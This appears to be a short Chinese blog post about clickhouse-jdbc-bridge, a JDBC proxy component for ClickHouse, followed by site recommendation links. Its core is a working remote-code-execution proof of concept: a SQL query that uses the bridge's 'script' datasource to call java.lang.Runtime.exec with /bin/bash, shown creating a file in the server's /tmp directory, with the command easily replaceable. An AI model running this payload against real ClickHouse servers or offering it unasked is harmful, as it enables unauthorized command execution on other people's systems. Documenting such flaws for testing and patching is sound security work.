clickhouse-jdbc-bridge rce

azraelxuemo2024-07-14 9:16

clickhouse-jdbc-bridge 是什么

JDBC bridge for ClickHouse®. It acts as a stateless proxy passing queries from ClickHouse to external datasources. With this extension, you can run distributed query on ClickHouse across multiple datasources in real time, which in a way simplifies the process of building data pipelines for data warehousing, monitoring and integrity check etc.

简单来说是clickhouse服务端的一个组件 功能是用来创建新的jdbc连接

https://github.com/ClickHouse/clickhouse-jdbc-bridge

RCE

当我们连接到clickhouse的时候,如果服务端支持clickhouse-jdbc-bridge

那么可以输入以下命令RCE

复制代码 
SELECT *
FROM jdbc('script', 's=[3];s[0]="/bin/bash";s[1]="-c";s[2]="touch /tmp/1.txt";java.lang.Runtime.getRuntime().exec(s);')

然后可以在服务器端/tmp目录下看到1.txt

相关推荐
雾喔14 分钟前
redis简单命令
数据库·redis·缓存
IT邦德15 分钟前
Oracle 26ai 图数据库
数据库·oracle
代码探秘者15 分钟前
【大模型应用】一篇弄懂Skill
数据结构·数据库·python·算法·spring
014-code16 分钟前
如何使用 Redis实现一个简易消息队列?
数据库·redis·缓存·消息队列
talen_hx29620 分钟前
screw-core生成数据库表结构文档简单例子
数据库·笔记·学习
Leo.yuan20 分钟前
什么是主数据管理?主数据管理怎么做?
大数据·数据库
运维行者_30 分钟前
Applications Manager 中的 Azure 监控
运维·服务器·网络·数据库·后端·python·flask
野生技术架构师32 分钟前
制造业数据库选型实战:为什么我们从 MySQL 迁移到 TiDB
数据库·mysql·tidb
麦聪聊数据38 分钟前
从“手动跑数”到“数据超市”,企业内部 API 权限管控与双轨分发架构解析
数据库·sql·低代码·restful
电商API&Tina39 分钟前
主流跨境平台多站点 API 接入流程:淘宝天猫京东API接口
java·大数据·网络·数据库·人工智能·sql·json
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04班级宠物园部署指南05小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)06【计算机一级WPSoffice】小黑课堂题库软件下载安装教程(2026年3月最新版)07Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南08UV安装并设置国内源09OpenClaw 使用和管理 MCP 完全指南10中国象棋-html版本